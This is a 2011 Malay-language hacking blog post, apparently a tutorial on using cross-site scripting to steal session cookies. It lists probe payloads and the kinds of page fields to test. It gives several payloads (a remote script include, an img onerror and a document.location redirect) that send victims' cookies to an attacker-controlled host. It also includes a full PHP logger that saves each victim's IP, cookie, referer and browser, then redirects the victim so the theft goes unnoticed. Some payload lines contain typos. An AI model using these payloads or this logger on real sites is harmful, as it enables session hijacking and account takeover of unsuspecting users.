Monday, 7 November 2011

Cross-Site Scripting - Tutorial Super Susah hik.. hik

--==[Cr0ss-Site Scripting]==--

Apakah itu Xss(Cross-Site scripting)?

XSS, singkatan dari apa yang dikenali sebagai Cross-Site Scripting adalah proses menyuntik JavaScript (terutama) dan juga HTML ke sebuah laman web untuk maklum balas penting. Ulasan ini mungkin mengandungi banyak hal, salah, paling sering menjadi cookies pengguna. Sekarang, untuk semua orang membaca ini, saya berasumsi bahawa anda tahu apa cookies dan bagaimana ia digunakan pada laman web, tetapi jika tidak, saya akan menjelaskan anyways.
 
Kuki adalah pembolehubah yang web-browser gunakan untuk menyimpan log masuk anda. Tanpa cookies, anda tidak boleh "tetap masuk dalam" di laman web kegemaran anda. Hal ini penting kerana jika seseorang adalah untuk mendapatkan cookies anda, dia dengan mudah boleh spoof maklumat login anda tanpa perlu mengetahui password anda. Beberapa cookies cukup mendasar, seperti PHPSESSID, yang hanya sesi anda pada laman PHP powered. Jika website hanya menggunakan cookies PHPSESSID untuk mengesahkan penggunanya, seseorang dapat mencuri cookies melalui kerentanan XSS dan spoof siapa pun yang memiliki cookies penyerang.

"Hampir 90% website terdedah kepada serang XSS, tidak terkecuali website kerajaan"

--==[Dua Method Serangan XSS]==--

a) Dasar XSS (user-bentuk merefleksikan kembali XSS).
     b) Memisahkan HTTP Respon.

         1. Dasar XSS
             a. Ini adalah sesuatu yang sederhana, seperti medan carian yang membolehkan masukkan HTML. Apabila pengguna mencari untuk sesuatu dan input tercermin pada halaman berikut, ini mungkin menunjukkan tanda-tanda kemungkinan XSS. Sekarang, ketika pengguna mencari sesuatu seperti <h1> ujian </ h1>, jika laman kembali mengandungi tajuk besar yang bertuliskan "test", bidang ini rentan terhadap suntikan HTML. Jika pengguna adalah untuk mencari <script> alert (1) </ script>, dan halaman kembali berisi dan tempat amaran yang berbunyi "1", bidang ini juga rentan terhadap XSS Suntikan.

         2. HTTP Respon Memisahkan
             a. Ini ada hubungannya dengan header yang digunakan pelayar anda untuk berkomunikasi dengan komputer pelayan. Jika laman yang membolehkan anda untuk menukar mereka melalui pos atau mendapatkan vars, dan mencerminkan maklumat kembali, anda boleh dengan mudah mengubah header dengan keperluan anda untuk cross-site script halaman. Paling umum, header yang adalah XSS'able adalah User-Agent: header. Kebanyakan laman tidak membersihkan agen pengguna ketika memantulkan kembali bimbit pengguna sifat (paling sering pada halaman 404.)

--==[Cara untuk mencari XSS vuln di website]==--

Cara yang paling senang ialah dgn cara manual.

Tempat yang perlu di periksa.

 a) Search Field
        b) Comment Fields
        c) Feedback Forms
        d) Login Forms
        e) Error Pages
         f) Search Field

Kemudian Cuba inject salah satu script ini:
1======> <script type="text/javascript"> alert('www.hackadicted.blogspot.com') </script>
2======> <h1><font color="#00FF00">www.hackadicted.blogspot.com</font></h1>

Jika script (1) akan memaparkan kotak "www.hackadicted.blogspot.com"
Jika untuk (2) akan terhasilnya tulisan "www.hackadicted.blogspot.com" di page.

--==[Cara Bagaimana hendak mencuri Cookies melalui XSS attack]==--

[Code]

<script src=http://site.com/h3x4.js>
pekara ini boleh terjadi jikalau website tersebut mmbenarkan javascript untuk beroperasi. Jikalau ini terjadi
kamu boleh mebuat satu file javascript di remote server dan mlancarkannya dgn mngunakan <script src="">
di website tersebut.

<img src=xss.png oneror="document.location='http://site.com/log.php?cookie=""+document.cookie>
script ini akan cuba untuk menghasilkan gambar palsu "xss.png" dan menghasilkan error. Bila error tersebut
terhasil ia secara automatik akan mlancarkan javascript lalu mncuri cookie mangsa.

<script>document.location="document location="http://site.com/log.php?c="+document.cookie+"&redirect=http://siteb.com";</script>
Ini adalah yang paling asas JavaScript untuk usaha mencuri cookies. Inilah yang kemungkinan besar akan ditempatkan di dalam salah satu daripada banyak fail. Js yang diambil oleh pelayan remote.

Script ini akan mengarahkan semula laman web untukhttp://site.com/log.php?c [MEREKA COOKIE] = & redirect =http://siteb.com

         GET c pembolehubah mengandungi cookies pengguna daripada laman berikut. Bahagian redirect hanyalah GET var yang akan mengarahkan mereka dari logger, untuk website lain, sehingga mereka tidak melihat TERLALU sesuatu yang aneh. Cara terbaik untuk mengelakkan kecurigaan adalah untuk mengarahkan mereka ke halaman yang sama, hanya halaman yang berbeza.

         Keterangan JavaScript jika anda belum tahu itu:
         document.location = ""; atau document.location (); adalah fungsi dalam JavaScript bahawa perubahan dokumen (halaman web)
         lokasi. document.cookie adalah cara JavaScript cookies menyimpan maklumat pada sebuah laman web. Kebanyakan semuanya  
        dapat dipanggil dari dokumen .* apapun.


--==[Scripts Dan Syntax untuk log.php dan H3x4.js]==--

-Evil.js

document.location="http://yoursite.com/logger.php?cookie="+document.cookie+"&redirect=http://theirsite.com/diff_page.php";

    -Log.php

<?php
/*
** www.hackadicted.blogspot.com
** www.hackadicted.blogspot.com
*/

$ip = $_SERVER['REMOTE_ADDR'];
$cookie = $_GET['cookie'];
$referer = $_SERVER['HTTP_REFERER'];
$browser = $_SERVER['HTTP_USER_AGENT'];
$redirect = $_GET['redirect'];

$data = "IP: " . $ip . "\n"
."Cookie: " . $cookie . "\n"
."Referrer: " . $referer . "\n"
."Browser: " . $browser . "\n\n";

$log = "cookies.txt";
@chmod($log, 0777);

$f = fopen($log, 'a');
fwrite($f, $data);
fclose($f);

@header("Location: $redirect");

?>

kemudian simpan di remote server (server anda)

-Anda pening? I pun pening.. o.O?-


Credit: Itik Salai

No comments:

Post a Comment